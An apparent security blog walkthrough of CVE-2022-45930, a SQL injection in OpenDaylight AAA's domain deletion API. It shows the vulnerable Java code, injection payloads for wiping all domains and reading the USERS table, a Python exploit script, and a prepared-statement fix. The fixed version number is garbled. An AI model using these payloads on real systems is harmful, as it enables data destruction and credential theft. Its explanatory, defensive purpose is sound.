CVE-2022-45930 - SQL Injection Vulnerability in OpenDaylight AAA’s Domain Deletion API — Deep Dive & Exploit Walkthrough

OpenDaylight (ODL) is a prominent open-source platform in the network automation world. However, like any software, it isn’t immune to security flaws. One notable example is CVE-2022-45930, a SQL injection vulnerability in AAA’s domain management API. In this post, we’ll break down how this vulnerability appears, where it lives in the code, how to exploit it, and what you need to do to fix or avoid it.

Vulnerable Component: AAA (Authentication, Authorization, and Accounting)

- Source File: DomainStore.java (H2 Datastore backend)

Impacted Function: deleteDomain

- API Impacted: /auth/v1/domains/
- CVE Reference: CVE-2022-45930

Where’s the Bug?

The vulnerable code lives in the domain deletion process. When a REST API call is made to delete a domain (DELETE /auth/v1/domains/{id}), the backend Java code passes the supplied id straight into an SQL statement—without any parameter processing.

Code Snippet (Vulnerable Version)

// aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/DomainStore.java

@Override
public void deleteDomain(String domainid) throws IDMStoreException {
    String sql = "DELETE FROM DOMAINS WHERE DOMAINID='" + domainid + "'";
    try (Connection conn = getConnection();
         Statement stmt = conn.createStatement()) {
        stmt.executeUpdate(sql);
    } catch (SQLException e) {
        throw new IDMStoreException("Failed to delete: " + domainid, e);
    }
}

> See the problem? The domainid string is inserted directly into the query without sanitization or using a prepared statement.

The vulnerable endpoint is

DELETE /auth/v1/domains/{id}
Authorization: [token]

Let’s say an attacker has a basic account, or in some cases can trigger this endpoint unauthenticated due to misconfiguration.

Crafting a Malicious domainid

Injecting a single quote and additional SQL lets the attacker manipulate database queries. For example:

DELETE /auth/v1/domains/' OR '1'='1

This results in the following SQL

DELETE FROM DOMAINS WHERE DOMAINID='' OR '1'='1'

This would delete all domains in the database, not just the intended one. But that’s just the start.

Going Further: Extracting Data

Suppose the database supports stacked queries (multiple statements separated by ;), and H2 may allow this depending on configurations. An attacker can try:

DELETE /auth/v1/domains/' ; SELECT * FROM USERS; --

The SQL becomes

DELETE FROM DOMAINS WHERE DOMAINID=''; SELECT * FROM USERS; --'

Now the attacker can retrieve sensitive data if the results are ever disclosed in an error message or response body.

> 💥 Note: This is a classic and dangerous vector, and the attacker could potentially escalate depending on other application weaknesses.

Real-World Exploit Example

Here’s a Python snippet using the requests library that demonstrates deleting all domains by exploiting the SQL injection.

import requests

base_url = 'http://odl-server:8181';
domain_injection = "' OR '1'='1"
endpoint = f"/auth/v1/domains/{domain_injection}"

headers = {
    'Authorization': 'Bearer YOUR_TOKEN_HERE'
}

response = requests.delete(base_url + endpoint, headers=headers)

print("Response code:", response.status_code)
print("Response body:", response.text)

Result: Every domain record in the ODL AAA database could be wiped out.

Solution

Upgrading is *critical*. The vulnerability is fixed after version .16.5.  
Modern versions use *prepared statements* to prevent SQL injection.

Secure Code Example

@Override
public void deleteDomain(String domainid) throws IDMStoreException {
    String sql = "DELETE FROM DOMAINS WHERE DOMAINID = ?";
    try (Connection conn = getConnection();
         PreparedStatement ps = conn.prepareStatement(sql)) {
        ps.setString(1, domainid);
        ps.executeUpdate();
    } catch (SQLException e) {
        throw new IDMStoreException("Failed to delete: " + domainid, e);
    }
}

References

- OpenDaylight AAA Source Code
- Upstream Commit Fix
- National Vulnerability Database (NVD) Entry
- OpenDaylight Security Advisory

Conclusion

SQL injection is old news, but it’s still showing up in critical infrastructure tools like OpenDaylight. This specific bug, CVE-2022-45930, is easy to exploit and potentially devastating if left unchecked. Make sure you’re running the latest version, audit your code for string-injected SQL, and always use parameterized statements.

Stay safe and code defensively!

---
*This article was written exclusively for you, summarizing public sources with hands-on examples for deeper understanding.*

Timeline

Published on: 11/27/2022 03:15:00 UTC
Last modified on: 11/30/2022 20:47:00 UTC